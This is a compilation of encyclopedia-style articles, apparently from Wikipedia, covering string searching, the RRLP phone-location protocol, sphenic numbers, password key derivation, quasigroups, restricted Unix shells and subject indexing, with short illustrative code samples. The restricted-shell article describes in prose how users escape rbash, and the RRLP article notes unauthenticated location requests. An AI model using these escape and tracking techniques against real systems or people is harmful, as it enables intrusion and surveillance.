In computer science, the Commentz-Walter algorithm is a string searching algorithm invented by Beate Commentz-Walter.[1] Like the Aho–Corasick string matching algorithm, it can search for multiple patterns at once. It combines ideas from Aho–Corasick with the fast matching of the Boyer–Moore string-search algorithm. For a text of length n and maximum pattern length of m, its worst-case running time is O(mn), though the average case is often much better.[2]
GNU grep once implemented a string matching algorithm very similar to Commentz-Walter.[3]
The paper on the algorithm was first published by Beate Commentz-Walter in 1979 through Saarland University and typed by "R. Scherner".[1] The paper detailed two differing algorithms that she claimed combined the ideas of Aho–Corasick and Boyer–Moore, which she called algorithms B and B1. The paper mostly focuses on algorithm B, however.
The Commentz-Walter algorithm combines two known algorithms in order to better address the multi-pattern matching problem. These two algorithms are Boyer–Moore, which addresses single-pattern matching using filtering, and Aho–Corasick. To do this, the algorithm implements a suffix automaton to search through patterns within an input string, while also using reversed patterns, unlike Aho–Corasick.[4]
Commentz-Walter has two phases: a pre-computing phase and a matching phase. In the first phase, the pre-computing phase, the algorithm builds a pattern tree from the reversed patterns. The second phase, the matching phase, draws on the other two algorithms: using Boyer–Moore's technique of shifting and Aho–Corasick's technique of finite automata, the Commentz-Walter algorithm can begin matching.[4]
The Commentz-Walter algorithm scans backwards through the input string, checking for a mismatch. When it finds a mismatch, the algorithm already knows some of the characters that match, and uses this information as an index into a pre-computed table to find the distance it must shift; it then begins another matching attempt.
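The backward-scanning idea can be sketched as follows. This is a deliberately simplified, hypothetical illustration: it builds a trie of the reversed patterns and, unlike the real algorithm, shifts conservatively by one position instead of consulting the precomputed shift tables.

```python
# Simplified sketch of Commentz-Walter-style backward matching: a trie built
# from the reversed patterns is walked while scanning backwards from an
# alignment point.  The real algorithm derives larger shifts from
# precomputed tables; here we shift conservatively by 1 after each attempt.

def build_reversed_trie(patterns):
    """Build a trie of the reversed patterns; terminal nodes store the pattern."""
    trie = {}
    for p in patterns:
        node = trie
        for ch in reversed(p):
            node = node.setdefault(ch, {})
        node["$"] = p          # mark a complete (reversed) pattern
    return trie

def search(text, patterns):
    """Return (start, pattern) for every occurrence of any pattern in text."""
    trie = build_reversed_trie(patterns)
    minlen = min(len(p) for p in patterns)
    hits = []
    i = minlen - 1             # alignment point: candidate end of a match
    while i < len(text):
        node, j = trie, i
        while j >= 0 and text[j] in node:
            node = node[text[j]]
            if "$" in node:    # a full pattern matched, ending at position i
                hits.append((j, node["$"]))
            j -= 1
        i += 1                 # conservative shift; CW would shift further
    return hits
```

A usage example: `search("ushers", ["he", "she"])` finds both patterns ending at index 3, reporting their start positions.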
Comparing Aho–Corasick to the Commentz-Walter algorithm in terms of time complexity: Aho–Corasick is linear, O(m + n + k), where k is the number of matches, while Commentz-Walter is quadratic, O(mn), in the worst case. The reason is that Commentz-Walter was developed by adding the shifts of the Boyer–Moore string-search algorithm to Aho–Corasick, thus moving its worst-case complexity from linear to quadratic.
According to a study in the Journal of the National Science Foundation of Sri Lanka, Commentz-Walter seems to be generally faster than the Aho–Corasick string matching algorithm, but only when long patterns are used. The journal states, however, that there is no critical analysis of this claim and that there is a lack of general agreement on the performance of the algorithm.[5]
In a visualization of the algorithm's running time in a study by the International Journal of Advanced Computer Science and Information Technology, the performance of the algorithm increased linearly as the shortest pattern in the pattern set increased.[4]
In the original Commentz-Walter paper, an alternative algorithm was also presented. This algorithm, known as B1, operates similarly to the main Commentz-Walter algorithm, the only difference being the way the pattern tree is used during the scanning phase.
The paper also claims this algorithm matches better, at the cost of increased running time and space in both the preprocessing and search phases. This algorithm has not been formally tested in other studies, however, so its actual performance is unknown.[1]
https://en.wikipedia.org/wiki/Commentz-Walter_algorithm
Radio resource location services (LCS) protocol (RRLP) applies to GSM and UMTS cellular networks. It is used to exchange messages between a handset and an SMLC in order to provide geolocation information;[1] e.g., in the case of emergency calls. The protocol was developed in order to fulfil the Wireless Enhanced 911 requirements in the United States. However, since the protocol does not require any authentication and can be used outside of a voice call or SMS transfer, its use is not restricted to emergency calls and can be used by law enforcement to pinpoint the exact geolocation of the target's mobile phone. RRLP was first specified in 3GPP TS 04.31 - Location Services (LCS); Mobile Station (MS) - Serving Mobile Location Centre (SMLC); Radio Resource LCS Protocol (RRLP).[2]
Harald Welte demonstrated at HAR2009[3] that many high-end smartphones submit their GPS location to the mobile operator when requested, without any sort of authentication.
RRLP supports two positioning methods:
The method type indicates whether MS-based or MS-assisted location is to be performed.
In this mode, the network typically needs to send so-called assistance data to the phone.
https://en.wikipedia.org/wiki/Radio_resource_location_services_protocol
In number theory, a sphenic number (from Greek: σφήνα, 'wedge') is a positive integer that is the product of three distinct prime numbers. Because there are infinitely many prime numbers, there are also infinitely many sphenic numbers.
A sphenic number is a product pqr where p, q, and r are three distinct prime numbers. In other words, the sphenic numbers are the square-free 3-almost primes.
The smallest sphenic number is 30 = 2 × 3 × 5, the product of the smallest three primes.
The first few sphenic numbers are 30, 42, 66, 70, 78, 102, 105, 110, 114, 130, ...
The largest known sphenic number at any time can be obtained by multiplying together the three largest known primes.
All sphenic numbers have exactly eight divisors. If we express the sphenic number as n = p · q · r, where p, q, and r are distinct primes, then the set of divisors of n will be: {1, p, q, r, pq, pr, qr, n}.
The converse does not hold. For example, 24 is not a sphenic number, but it has exactly eight divisors.
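The definition and the divisor count can be checked directly; the helper functions below are a straightforward sketch, not an optimized factorization routine.

```python
# A sphenic number is a product of three distinct primes, so its
# factorization has exactly three prime factors, each with exponent 1,
# and it therefore has exactly 2 * 2 * 2 = 8 divisors.
import math

def prime_factors(n):
    """Return the prime factorization of n as a list of (prime, exponent)."""
    factors, d = [], 2
    while d * d <= n:
        if n % d == 0:
            e = 0
            while n % d == 0:
                n //= d
                e += 1
            factors.append((d, e))
        d += 1
    if n > 1:
        factors.append((n, 1))
    return factors

def is_sphenic(n):
    """True if n is a product of three distinct primes (all exponents 1)."""
    f = prime_factors(n)
    return len(f) == 3 and all(e == 1 for _, e in f)

def num_divisors(n):
    """Number of divisors, computed from the exponents of the factorization."""
    return math.prod(e + 1 for _, e in prime_factors(n))
```

This also exhibits the failure of the converse: 24 = 2³ × 3 has eight divisors but is not sphenic.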
All sphenic numbers are by definition squarefree, because the prime factors must be distinct.
The Möbius function of any sphenic number is −1.
The cyclotomic polynomials Φn(x), taken over all sphenic numbers n, may contain arbitrarily large coefficients[1] (for n a product of two primes the coefficients are ±1 or 0).
Any multiple of a sphenic number (other than by 1) is not sphenic. This is easily proved: multiplication by any integer greater than 1 either adds another prime factor or raises an existing factor to a higher power.
The first case of two consecutive sphenic integers is 230 = 2×5×23 and 231 = 3×7×11. The first case of three is 1309 = 7×11×17, 1310 = 2×5×131, and 1311 = 3×19×23. There is no case of more than three, because every fourth consecutive positive integer is divisible by 4 = 2×2 and therefore not squarefree.
The numbers 2013 (3×11×61), 2014 (2×19×53), and 2015 (5×13×31) are all sphenic. The next three consecutive sphenic years will be 2665 (5×13×41), 2666 (2×31×43) and 2667 (3×7×127) (sequence A165936 in the OEIS).
https://en.wikipedia.org/wiki/Sphenic_number
In cryptography, a key derivation function (KDF) is a cryptographic algorithm that derives one or more secret keys from a secret value such as a master key, a password, or a passphrase using a pseudorandom function (which typically uses a cryptographic hash function or block cipher).[1][2][3] KDFs can be used to stretch keys into longer keys or to obtain keys of a required format, such as converting a group element that is the result of a Diffie–Hellman key exchange into a symmetric key for use with AES. Keyed cryptographic hash functions are popular examples of pseudorandom functions used for key derivation.[4]
The first[citation needed] deliberately slow (key stretching) password-based key derivation function was called "crypt" (or "crypt(3)" after its man page), and was invented by Robert Morris in 1978. It would encrypt a constant (zero), using the first 8 characters of the user's password as the key, by performing 25 iterations of a modified DES encryption algorithm (in which a 12-bit number read from the real-time computer clock is used to perturb the calculations). The resulting 64-bit number is encoded as 11 printable characters and then stored in the Unix password file.[5] While it was a great advance at the time, increases in processor speeds since the PDP-11 era have made brute-force attacks against crypt feasible, and advances in storage have rendered the 12-bit salt inadequate. The crypt function's design also limits the user password to 8 characters, which limits the keyspace and makes strong passphrases impossible.[citation needed]
Although high throughput is a desirable property in general-purpose hash functions, the opposite is true in password security applications, in which defending against brute-force cracking is a primary concern. The growing use of massively-parallel hardware such as GPUs, FPGAs, and even ASICs for brute-force cracking has made the selection of a suitable algorithm even more critical, because a good algorithm should not only enforce a certain amount of computational cost on CPUs but also resist the cost/performance advantages of modern massively-parallel platforms. Various algorithms have been designed specifically for this purpose, including bcrypt, scrypt and, more recently, Lyra2 and Argon2 (the latter being the winner of the Password Hashing Competition). The large-scale Ashley Madison data breach, in which roughly 36 million password hashes were stolen by attackers, illustrated the importance of algorithm selection in securing passwords. Although bcrypt was employed to protect the hashes (making large-scale brute-force cracking expensive and time-consuming), a significant portion of the accounts in the compromised data also contained a password hash based on the fast general-purpose MD5 algorithm, which made it possible for over 11 million of the passwords to be cracked in a matter of weeks.[6]
In June 2017, the U.S. National Institute of Standards and Technology (NIST) issued a new revision of its digital authentication guidelines, NIST SP 800-63B-3,[7]: 5.1.1.2 stating that: "Verifiers SHALL store memorized secrets [i.e. passwords] in a form that is resistant to offline attacks. Memorized secrets SHALL be salted and hashed using a suitable one-way key derivation function. Key derivation functions take a password, a salt, and a cost factor as inputs then generate a password hash. Their purpose is to make each password guessing trial by an attacker who has obtained a password hash file expensive and therefore the cost of a guessing attack high or prohibitive."
Modern password-based key derivation functions, such as PBKDF2,[2] are based on a recognized cryptographic hash, such as SHA-2, use more salt (at least 64 bits, chosen randomly) and a high iteration count. NIST recommends a minimum iteration count of 10,000.[7]: 5.1.1.2 "For especially critical keys, or for very powerful systems or systems where user-perceived performance is not critical, an iteration count of 10,000,000 may be appropriate."[8]: 5.2
The original use for a KDF is key derivation, the generation of keys from secret passwords or passphrases. Variations on this theme include:
Key derivation functions are also used in applications to derive keys from secret passwords or passphrases, which typically do not have the desired properties to be used directly as cryptographic keys. In such applications, it is generally recommended that the key derivation function be made deliberately slow so as to frustrate brute-force or dictionary attacks on the password or passphrase input value.
Such use may be expressed as DK = KDF(key, salt, iterations), where DK is the derived key, KDF is the key derivation function, key is the original key or password, salt is a random number which acts as cryptographic salt, and iterations refers to the number of iterations of a sub-function. The derived key is used instead of the original key or password as the key to the system. The values of the salt and the number of iterations (if it is not fixed) are stored with the hashed password or sent as cleartext (unencrypted) with an encrypted message.[10]
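This scheme maps directly onto PBKDF2 as exposed by Python's standard library (`hashlib.pbkdf2_hmac`); the password, salt size, and iteration count below are illustrative only.

```python
# DK = KDF(key, salt, iterations), realized here with PBKDF2-HMAC-SHA256
# from the Python standard library.  Parameter choices are illustrative.
import hashlib
import hmac
import os

password = b"correct horse battery staple"
salt = os.urandom(16)        # random salt, stored alongside the derived key
iterations = 100_000         # cost factor; raise it as hardware improves

# Derive a 32-byte key from the password, salt, and iteration count.
dk = hashlib.pbkdf2_hmac("sha256", password, salt, iterations, dklen=32)

def verify(candidate, salt, iterations, stored_dk):
    """Repeat the derivation with the stored parameters; compare in constant time."""
    test = hashlib.pbkdf2_hmac("sha256", candidate, salt, iterations, dklen=32)
    return hmac.compare_digest(test, stored_dk)
```

Verification simply re-runs the KDF with the stored salt and iteration count, which is why those values may be stored or transmitted in the clear.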
The difficulty of a brute force attack increases with the number of iterations. A practical limit on the iteration count is the unwillingness of users to tolerate a perceptible delay in logging into a computer or seeing a decrypted message. The use of salt prevents attackers from precomputing a dictionary of derived keys.[10]
An alternative approach, called key strengthening, extends the key with a random salt, but then (unlike in key stretching) securely deletes the salt.[11] This forces both the attacker and legitimate users to perform a brute-force search for the salt value.[12] Although the paper that introduced key stretching[13] referred to this earlier technique and intentionally chose a different name, the term "key strengthening" is now often (arguably incorrectly) used to refer to key stretching.
Despite their original use for key derivation, KDFs are possibly better known for their use in password hashing (password verification by hash comparison), as used by the passwd file or shadow password file. Password hash functions should be relatively expensive to calculate in case of brute-force attacks, and the key stretching of KDFs happens to provide this characteristic.[citation needed] The non-secret parameters are called "salt" in this context.
In 2013 a Password Hashing Competition was announced to choose a new, standard algorithm for password hashing. On 20 July 2015 the competition ended and Argon2 was announced as the final winner. Four other algorithms received special recognition: Catena, Lyra2, Makwa and yescrypt.[14]
As of May 2023, the Open Worldwide Application Security Project (OWASP) recommends the following KDFs for password hashing, listed in order of priority:[15]
https://en.wikipedia.org/wiki/Password_hashing#Salting
In mathematics, especially in abstract algebra, a quasigroup is an algebraic structure that resembles a group in the sense that "division" is always possible. Quasigroups differ from groups mainly in that the associative and identity element properties are optional. In fact, a nonempty associative quasigroup is a group.[1][2]
A quasigroup that has an identity element is called a loop.
There are at least two structurally equivalent formal definitions of quasigroup:
The homomorphic image of a quasigroup defined with a single binary operation, however, need not be a quasigroup, in contrast to a quasigroup defined with three primitive operations.[3] We begin with the first definition.
A quasigroup (Q, ∗) is a non-empty set Q with a binary operation ∗ (that is, a magma, indicating that a quasigroup has to satisfy the closure property), obeying the Latin square property. This states that, for each a and b in Q, there exist unique elements x and y in Q such that both a ∗ x = b and y ∗ a = b hold. (In other words: each element of the set occurs exactly once in each row and exactly once in each column of the quasigroup's multiplication table, or Cayley table. This property ensures that the Cayley table of a finite quasigroup, and, in particular, a finite group, is a Latin square.) The requirement that x and y be unique can be replaced by the requirement that the magma be cancellative.[4][a]
The unique solutions to these equations are written x = a \ b and y = b / a. The operations '\' and '/' are called, respectively, left division and right division. With regard to the Cayley table, the first equation (left division) means that the b entry in the a row is in the x column, while the second equation (right division) means that the b entry in the a column is in the y row.
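These table look-ups can be made concrete for a small finite quasigroup; the 3-element Cayley table below (subtraction mod 3, which is nonassociative and has no identity) is chosen only for illustration.

```python
# A finite quasigroup given by its Cayley table (a Latin square).  Left and
# right division are read off the table exactly as described above:
# x = a \ b is the column of the b entry in row a, and y = b / a is the row
# of the b entry in column a.
table = [[0, 2, 1],
         [1, 0, 2],
         [2, 1, 0]]          # entry table[a][x] is a * x (here: a - x mod 3)

def op(a, x):
    return table[a][x]

def left_div(a, b):
    """a \\ b: the unique x with a * x = b (column of b in row a)."""
    return table[a].index(b)

def right_div(b, a):
    """b / a: the unique y with y * a = b (row of b in column a)."""
    return [row[a] for row in table].index(b)
```

Because each row and column of the table contains every element exactly once, both `index` calls always succeed and return a unique answer, which is precisely the Latin square property.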
The empty set equipped with the empty binary operation satisfies this definition of a quasigroup. Some authors accept the empty quasigroup but others explicitly exclude it.[5][6]
Given some algebraic structure, an identity is an equation in which all variables are tacitly universally quantified, and in which all operations are among the primitive operations proper to the structure. A class of algebraic structures that satisfy axioms given solely by identities is called a variety. Many standard results in universal algebra hold only for varieties. Quasigroups form a variety if left and right division are taken as primitive.
A right-quasigroup (Q, ∗, /) is a type (2, 2) algebra satisfying both identities: y = (y / x) ∗ x and y = (y ∗ x) / x.
A left-quasigroup (Q, ∗, \) is a type (2, 2) algebra satisfying both identities: y = x ∗ (x \ y) and y = x \ (x ∗ y).
A quasigroup (Q, ∗, \, /) is a type (2, 2, 2) algebra (i.e., equipped with three binary operations) satisfying the identities:[b] y = (y / x) ∗ x, y = (y ∗ x) / x, y = x ∗ (x \ y), and y = x \ (x ∗ y).
In other words: Multiplication and division in either order, one after the other, on the same side by the same element, have no net effect.
Hence if (Q, ∗) is a quasigroup according to the definition of the previous section, then (Q, ∗, \, /) is the same quasigroup in the sense of universal algebra. And vice versa: if (Q, ∗, \, /) is a quasigroup in the sense of universal algebra, then (Q, ∗) is a quasigroup according to the first definition.
A loop is a quasigroup with an identity element; that is, an element, e, such that x ∗ e = x and e ∗ x = x for all x in Q.
It follows that the identity element, e, is unique, and that every element of Q has unique left and right inverses (which need not be the same).
A quasigroup with an idempotent element is called a pique ("pointed idempotent quasigroup"); this is a weaker notion than a loop but common nonetheless because, for example, given an abelian group, (A, +), taking its subtraction operation as quasigroup multiplication yields a pique (A, −) with the group identity (zero) turned into a "pointed idempotent". (That is, there is a principal isotopy (x, y, z) ↦ (x, −y, z).)
A loop that is associative is a group. A group can have a strictly nonassociative pique isotope, but it cannot have a strictly nonassociative loop isotope.
There are weaker associativity properties that have been given special names.
For instance, a Bol loop is a loop that satisfies either: x ∗ (y ∗ (x ∗ z)) = (x ∗ (y ∗ x)) ∗ z for each x, y and z in Q (a left Bol loop),
or else ((z ∗ x) ∗ y) ∗ x = z ∗ ((x ∗ y) ∗ x) for each x, y and z in Q (a right Bol loop).
A loop that is both a left and right Bol loop is a Moufang loop. This is equivalent to any one of the following single Moufang identities holding for all x, y, z: z ∗ (x ∗ (z ∗ y)) = ((z ∗ x) ∗ z) ∗ y, x ∗ (z ∗ (y ∗ z)) = ((x ∗ z) ∗ y) ∗ z, (z ∗ x) ∗ (y ∗ z) = (z ∗ (x ∗ y)) ∗ z, or (z ∗ x) ∗ (y ∗ z) = z ∗ ((x ∗ y) ∗ z).
According to Jonathan D. H. Smith, "loops" were named after the Chicago Loop, as their originators were studying quasigroups in Chicago at the time.[9]
Smith (2007) names the following important properties and subclasses:
A quasigroup is semisymmetric if any of the following equivalent identities hold for all x, y:[c] x ∗ (y ∗ x) = y, (x ∗ y) ∗ x = y, x = (y ∗ x) ∗ y, and x = y ∗ (x ∗ y).
Although this class may seem special, every quasigroup Q induces a semisymmetric quasigroup QΔ on the direct product cube Q3 via the following operation:
where "//" and "\\" are the conjugate division operations given by y // x = x / y and y \\ x = x \ y.
A quasigroup may exhibit semisymmetric triality.[10]
A narrower class is a totally symmetric quasigroup (sometimes abbreviated TS-quasigroup) in which all conjugates coincide as one operation: x ∗ y = x / y = x \ y. Another way to define (the same notion of) totally symmetric quasigroup is as a semisymmetric quasigroup that is commutative, i.e. x ∗ y = y ∗ x.
Idempotent totally symmetric quasigroups are precisely (i.e. in a bijection with) Steiner triples, so such a quasigroup is also called a Steiner quasigroup, and sometimes the latter is even abbreviated as squag. The term sloop refers to an analogue for loops, namely, totally symmetric loops that satisfy x ∗ x = 1 instead of x ∗ x = x. Without idempotency, totally symmetric quasigroups correspond to the geometric notion of extended Steiner triple, also called a Generalized Elliptic Cubic Curve (GECC).
A quasigroup (Q, ∗) is called weakly totally anti-symmetric if for all c, x, y ∈ Q, the following implication holds:[11] (c ∗ x) ∗ y = (c ∗ y) ∗ x implies x = y.
A quasigroup (Q, ∗) is called totally anti-symmetric if, in addition, for all x, y ∈ Q, the following implication holds:[11] x ∗ y = y ∗ x implies x = y.
This property is required, for example, in theDamm algorithm.
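As an illustration, the Damm algorithm folds the digits of a number through an order-10 totally anti-symmetric quasigroup; the table below is the one commonly quoted for the algorithm (reproduced here as an assumption from memory, so treat it as a sketch).

```python
# Check-digit computation in the style of the Damm algorithm.  DAMM is a
# Cayley table of a totally anti-symmetric quasigroup of order 10; the
# anti-symmetry ((c*x)*y = (c*y)*x implies x = y) is what makes adjacent
# transposition errors detectable.
DAMM = [
    [0, 3, 1, 7, 5, 9, 8, 6, 4, 2],
    [7, 0, 9, 2, 1, 5, 4, 8, 6, 3],
    [4, 2, 0, 6, 8, 7, 1, 3, 5, 9],
    [1, 7, 5, 0, 9, 8, 3, 4, 2, 6],
    [6, 1, 2, 3, 0, 4, 5, 9, 7, 8],
    [3, 6, 7, 4, 2, 0, 9, 5, 8, 1],
    [5, 8, 6, 9, 7, 2, 0, 1, 3, 4],
    [8, 9, 4, 5, 3, 6, 2, 0, 1, 7],
    [9, 4, 3, 8, 6, 1, 7, 2, 0, 5],
    [2, 5, 8, 1, 4, 3, 6, 7, 9, 0],
]

def damm_check_digit(number: str) -> int:
    """Fold the digits through the quasigroup; the interim value is the check digit."""
    interim = 0
    for ch in number:
        interim = DAMM[interim][int(ch)]
    return interim

def damm_valid(number_with_check: str) -> bool:
    """A number with its check digit appended folds back to 0."""
    return damm_check_digit(number_with_check) == 0
```

For example, the check digit of "572" is 4, and swapping two digits of "5724" makes validation fail.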
Quasigroups have the cancellation property: if ab = ac, then b = c. This follows from the uniqueness of left division of ab or ac by a. Similarly, if ba = ca, then b = c.
The Latin square property of quasigroups implies that, given any two of the three variables in xy = z, the third variable is uniquely determined.
The definition of a quasigroup can be treated as conditions on the left and right multiplication operators Lx, Rx : Q → Q, defined by Lx(y) = x ∗ y and Rx(y) = y ∗ x.
The definition says that both mappings are bijections from Q to itself. A magma Q is a quasigroup precisely when all these operators, for every x in Q, are bijective. The inverse mappings are left and right division, that is, Lx−1(y) = x \ y and Rx−1(y) = y / x.
In this notation the identities among the quasigroup's multiplication and division operations (stated in the section on universal algebra) are Lx ∘ Lx−1 = id, Lx−1 ∘ Lx = id, Rx ∘ Rx−1 = id, and Rx−1 ∘ Rx = id,
where id denotes the identity mapping on Q.
The multiplication table of a finite quasigroup is a Latin square: an n × n table filled with n different symbols in such a way that each symbol occurs exactly once in each row and exactly once in each column.
Conversely, every Latin square can be taken as the multiplication table of a quasigroup in many ways: the border row (containing the column headers) and the border column (containing the row headers) can each be any permutation of the elements. See Small Latin squares and quasigroups.
For a countably infinite quasigroup Q, it is possible to imagine an infinite array in which every row and every column corresponds to some element q of Q, and where the element a ∗ b is in the row corresponding to a and the column corresponding to b. In this situation too, the Latin square property says that each row and each column of the infinite array will contain every possible value precisely once.
For an uncountably infinite quasigroup, such as the group of non-zero real numbers under multiplication, the Latin square property still holds, although the name is somewhat unsatisfactory, as it is not possible to produce the array of combinations to which the above idea of an infinite array extends, since the real numbers cannot all be written in a sequence. (This is somewhat misleading, however, as the reals can be written in a sequence of length 𝔠, assuming the well-ordering theorem.)
The binary operation of a quasigroup is invertible in the sense that both Lx and Rx, the left and right multiplication operators, are bijective, and hence invertible.
Every loop element has a unique left and right inverse given by xλ = e / x and xρ = x \ e, so that xλ ∗ x = e and x ∗ xρ = e.
A loop is said to have (two-sided) inverses if xλ = xρ for all x. In this case the inverse element is usually denoted by x−1.
There are some stronger notions of inverses in loops that are often useful:
A loop has the inverse property if it has both the left and right inverse properties. Inverse property loops also have the antiautomorphic and weak inverse properties. In fact, any loop that satisfies any two of the above four identities has the inverse property and therefore satisfies all four.
Any loop that satisfies the left, right, or antiautomorphic inverse properties automatically has two-sided inverses.
A quasigroup or loop homomorphism is a map f : Q → P between two quasigroups such that f(xy) = f(x)f(y). Quasigroup homomorphisms necessarily preserve left and right division, as well as identity elements (if they exist).
Let Q and P be quasigroups. A quasigroup homotopy from Q to P is a triple (α, β, γ) of maps from Q to P such that α(x) ∗ β(y) = γ(x ∗ y)
for all x, y in Q. A quasigroup homomorphism is just a homotopy for which the three maps are equal.
An isotopy is a homotopy for which each of the three maps (α, β, γ) is a bijection. Two quasigroups are isotopic if there is an isotopy between them. In terms of Latin squares, an isotopy (α, β, γ) is given by a permutation of rows α, a permutation of columns β, and a permutation on the underlying element set γ.
An autotopy is an isotopy from a quasigroup to itself. The set of all autotopies of a quasigroup forms a group with the automorphism group as a subgroup.
Every quasigroup is isotopic to a loop. If a loop is isotopic to a group, then it is isomorphic to that group and thus is itself a group. However, a quasigroup that is isotopic to a group need not be a group. For example, the quasigroup on R with multiplication given by (x, y) ↦ (x + y)/2 is isotopic to the additive group (R, +), but is not itself a group as it has no identity element. Every medial quasigroup is isotopic to an abelian group by the Bruck–Toyoda theorem.
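The (x + y)/2 example can be checked directly: division always succeeds (the unique solution of a ∗ x = b is x = 2b − a), yet no element acts as an identity, since e ∗ x = x would force e = x.

```python
# The quasigroup on R with x * y = (x + y) / 2: division is always possible,
# but there is no identity element, and the operation is nonassociative.
def op(x, y):
    return (x + y) / 2

def left_div(a, b):
    """The unique x with a * x = b, namely x = 2b - a."""
    return 2 * b - a

def right_div(b, a):
    """The unique y with y * a = b (same formula: the operation is commutative)."""
    return 2 * b - a
```

A quick check: `op(0, 4)` is 2, not 4, so 0 is not an identity; the same failure occurs for every candidate e except e = x itself.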
Left and right division are examples of forming a quasigroup by permuting the variables in the defining equation. From the original operation ∗ (i.e., x ∗ y = z) we can form five new operations: x ∘ y := y ∗ x (the opposite operation), / and \, and their opposites. That makes a total of six quasigroup operations, which are called the conjugates or parastrophes of ∗. Any two of these operations are said to be "conjugate" or "parastrophic" to each other (and to themselves).
If the set Q has two quasigroup operations, ∗ and ·, and one of them is isotopic to a conjugate of the other, the operations are said to be isostrophic to each other. There are also many other names for this relation of "isostrophe", e.g., paratopy.
An n-ary quasigroup is a set with an n-ary operation, (Q, f) with f : Qn → Q, such that the equation f(x1, ..., xn) = y has a unique solution for any one variable if all the other n variables are specified arbitrarily. Polyadic or multiary means n-ary for some nonnegative integer n.
A 0-ary, or nullary, quasigroup is just a constant element of Q. A 1-ary, or unary, quasigroup is a bijection of Q to itself. A binary, or 2-ary, quasigroup is an ordinary quasigroup.
An example of a multiary quasigroup is an iterated group operation, y = x1 · x2 · ··· · xn; it is not necessary to use parentheses to specify the order of operations because the group is associative. One can also form a multiary quasigroup by carrying out any sequence of the same or different group or quasigroup operations, if the order of operations is specified.
There exist multiary quasigroups that cannot be represented in any of these ways. An n-ary quasigroup is irreducible if its operation cannot be factored into the composition of two operations in the following way: f(x1, ..., xn) = g(x1, ..., xi−1, h(xi, ..., xj), xj+1, ..., xn),
where 1 ≤ i < j ≤ n and (i, j) ≠ (1, n). Finite irreducible n-ary quasigroups exist for all n > 2; see Akivis & Goldberg (2001) for details.
An n-ary quasigroup with an n-ary version of associativity is called an n-ary group.
The number of isomorphism classes of small quasigroups (sequence A057991 in the OEIS) and loops (sequence A057771 in the OEIS) is given here:[14]
https://en.wikipedia.org/wiki/Quasigroup
The restricted shell is a Unix shell that restricts some of the capabilities available to an interactive user session, or to a shell script, running within it. It is intended to provide an additional layer of security, but is insufficient to allow execution of entirely untrusted software. A restricted mode operation is found in the original Bourne shell[1] and its later counterpart Bash,[2] and in the KornShell.[3] In some cases a restricted shell is used in conjunction with a chroot jail, in a further attempt to limit access to the system as a whole.
The restricted mode of the Bourne shell sh, and its POSIX workalikes, is used when the interpreter is invoked in one of the following ways:
The restricted mode of Bash is used when Bash is invoked in one of the following ways:
Similarly KornShell's restricted mode is produced by invoking it thus:
For some systems (e.g., CentOS), the invocation through rbash is not enabled by default, and the user obtains a command not found error if it is invoked directly, or a login failure if the /etc/passwd file indicates /bin/rbash as the user's shell.
It suffices to create a link named rbash pointing directly to bash. Though this invokes Bash directly, without the -r or --restricted options, Bash recognizes that it was invoked through rbash and comes up as a restricted shell.
This can be accomplished with the following simple commands (executed as root, either logged in as user root, or using sudo):
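The commands might look like the following sketch; the target paths follow a common Linux layout, and the demonstration below uses a scratch directory so it can be run without touching /bin.

```shell
# As root, the link described above would typically be created as:
#   ln -s /bin/bash /bin/rbash
# Demonstrated here in a scratch directory instead of /bin:
mkdir -p /tmp/rbash-demo
ln -sf /bin/bash /tmp/rbash-demo/rbash
readlink /tmp/rbash-demo/rbash
```

Invoking the shell through the `rbash` name is what triggers Bash's restricted mode; the link target is an ordinary bash binary.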
The following operations are not permitted in a restricted shell:
Bash adds further restrictions, including:[2]
Restrictions in the restricted KornShell are much the same as those in the restricted Bourne shell.[4]
The restricted shell is not secure. A user can break out of the restricted environment by running a program that features a shell function. The following is an example of the shell function in vi being used to escape from the restricted shell:
Or by simply starting a new unrestricted shell, if one is in the PATH, as demonstrated here:
Beyond the restricted modes of usual shells, specialized restricted shell programs include:
https://en.wikipedia.org/wiki/Restricted_shell
Subject indexing is the act of describing or classifying a document by index terms, keywords, or other symbols in order to indicate what different documents are about, to summarize their contents or to increase findability. In other words, it is about identifying and describing the subject of documents. Indexes are constructed, separately, on three distinct levels: terms in a document such as a book; objects in a collection such as a library; and documents (such as books and articles) within a field of knowledge.
Subject indexing is used in information retrieval, especially to create bibliographic indexes to retrieve documents on a particular subject. Examples of academic indexing services are Zentralblatt MATH, Chemical Abstracts and PubMed. Index terms were mostly assigned by experts, but author keywords are also common.
The process of indexing begins with an analysis of the subject of the document. The indexer must then identify terms which appropriately identify the subject, either by extracting words directly from the document or assigning words from a controlled vocabulary.[1] The terms in the index are then presented in a systematic order.
Indexers must decide how many terms to include and how specific the terms should be. Together this gives a depth of indexing.
The first step in indexing is to decide on the subject matter of the document. In manual indexing, the indexer would consider the subject matter in terms of answers to a set of questions such as "Does the document deal with a specific product, condition or phenomenon?".[2] As the analysis is influenced by the knowledge and experience of the indexer, two indexers may analyze the content differently and so come up with different index terms. This will impact the success of retrieval.
Automatic indexing follows set processes of analyzing frequencies of word patterns and comparing the results to other documents in order to assign documents to subject categories. It requires no understanding of the material being indexed. This leads to more uniform indexing, but at the expense of interpreting the true meaning. A computer program will not understand the meaning of statements and may therefore fail to assign some relevant terms or assign terms incorrectly. Human indexers focus their attention on certain parts of the document, such as the title, abstract, summary and conclusions, as analyzing the full text in depth is costly and time-consuming.[3] An automated system removes that time limit and allows the entire document to be analyzed, but can also be directed to particular parts of the document.
The second stage of indexing involves the translation of the subject analysis into a set of index terms. This can involve extracting terms from the document or assigning them from a controlled vocabulary. With the ability to conduct a full text search widely available, many people have come to rely on their own expertise in conducting information searches, and full text search has become very popular. Subject indexing and its experts (professional indexers, catalogers, and librarians) remain crucial to information organization and retrieval. These experts understand controlled vocabularies and are able to find information that cannot be located by full text search. The cost of expert analysis to create subject indexing is not easily compared to the cost of the hardware, software and labor needed to manufacture a comparable set of full-text, fully searchable materials. With new web applications that allow every user to annotate documents, social tagging has gained popularity, especially on the Web.[4]
One application of indexing, the book index, remains relatively unchanged despite the information revolution.
Extraction indexing involves taking words directly from the document. It uses natural language and lends itself well to automated techniques in which word frequencies are calculated and those with a frequency over a pre-determined threshold are used as index terms. A stop-list containing common words (such as "the" and "and") would be consulted, and such stop words would be excluded as index terms.
